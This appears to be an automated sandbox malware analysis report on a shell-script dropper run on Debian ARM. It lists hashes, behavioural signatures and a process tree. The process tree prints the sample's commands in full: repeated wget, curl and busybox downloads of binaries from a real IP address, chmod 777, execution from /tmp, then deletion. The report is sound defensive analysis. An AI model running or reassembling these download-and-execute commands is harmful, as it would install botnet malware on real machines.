Analysis
-
max time kernel
20s -
max time network
21s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/10/2024, 01:20
Static task
static1
Behavioral task
behavioral1
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
-
Size
10KB
-
MD5
e85cfec36f14cf1239aeb4b66816d9b6
-
SHA1
54996a37402bd68d4d9592629ba35466aa659e7b
-
SHA256
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583
-
SHA512
300a5cf3328c8392a91bc401ade0843b0d426078b4a7d026b0cfa6bc9959bb8f607eb8cdd63250e780224fc8cb68aea66d2993f7ad08286732684e392cfcf415
-
SSDEEP
192:S9G+eTfUXv3+Cs6BK+u+K+j+2+e+Z9p1gG+BFUp1gGC1xQTfUXvt+Cs6E+u+K+j+:S9G+Hcr+BFOC1xq
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 678 chmod 847 chmod 873 chmod 867 chmod 879 chmod 791 chmod 807 chmod 823 chmod 855 chmod 817 chmod 688 chmod 747 chmod 763 chmod 769 chmod 835 chmod 841 chmod 861 chmod 697 chmod 713 chmod 729 chmod 829 chmod -
Executes dropped EXE 21 IoCs
ioc pid Process /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ 679 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z 689 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI 699 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 715 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf 731 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk 749 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh 764 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC 770 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR 792 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx 808 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu 818 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY 824 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 830 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR 836 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu 842 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY 848 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 856 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR 862 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ 868 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z 874 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI 880 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI -
Checks CPU configuration 1 TTPs 21 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z curl File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ curl File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z curl File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI curl File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx curl File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY curl File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR curl File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk curl File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu curl File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR curl File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI curl File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 curl File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh curl File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC curl File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 curl File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 curl File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ curl File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf curl File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR curl File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu curl File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY curl
Processes
-
/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh1⤵PID:648
-
/bin/rm/bin/rm bins.sh2⤵PID:650
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:652
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:665
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:674
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:678
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:679
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:680
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:682
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:686
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:687
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:689
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:690
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:691
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:692
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:694
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:697
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:700
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:701
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:706
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:710
-
-
/bin/chmodchmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- File and Directory Permissions Modification
PID:713
-
-
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Executes dropped EXE
PID:715
-
-
/bin/rmrm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:716
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:717
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:726
-
-
/bin/chmodchmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:732
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:733
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:743
-
-
/bin/chmodchmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:761
-
-
/bin/chmodchmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:768
-
-
/bin/chmodchmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:787
-
-
/bin/chmodchmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:793
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:804
-
-
/bin/chmodchmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:816
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:822
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:828
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:834
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:837
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:838
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:840
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:843
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:844
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:846
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:850
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:853
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:860
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:866
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:872
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:878
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:881
-
-
